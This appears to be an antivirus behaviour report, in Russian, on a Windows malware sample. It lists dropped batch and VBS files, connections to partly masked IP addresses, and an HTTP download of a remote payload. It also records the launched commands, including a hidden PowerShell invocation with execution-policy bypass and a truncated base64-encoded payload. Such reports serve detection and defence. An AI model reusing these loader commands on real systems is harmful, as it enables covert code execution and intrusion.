Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cancroidea.bat
- %WINDIR%\temp\bhabar.vbs
- nul
Сетевая активность
Подключается к
- '10#.#72.132.57':80
- '62.##.208.170':80
TCP
Запросы HTTP GET
- http://10#.#72.132.57/arquivo_ce9a3936c11245e3be450d7f2cd03d68.txt
Другое
Ищет следующие окна
- ClassName: 'HTML Application Host Window Class' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' //nologo "%WINDIR%\Temp\bhabar.vbs"
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c "%WINDIR%\Temp\cancroidea.bat" (со скрытым окном)
- '%WINDIR%\syswow64\timeout.exe' /t 1 /nobreak
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w hidden -noprofile -ep bypass -c "$b64='JGxpYmVsZXIgPSAnVmtGSic7JGxvb3NlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGxpYmVsZXIpOyRzaWx1cm9pZGVpID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVR... (со скрытым окном)
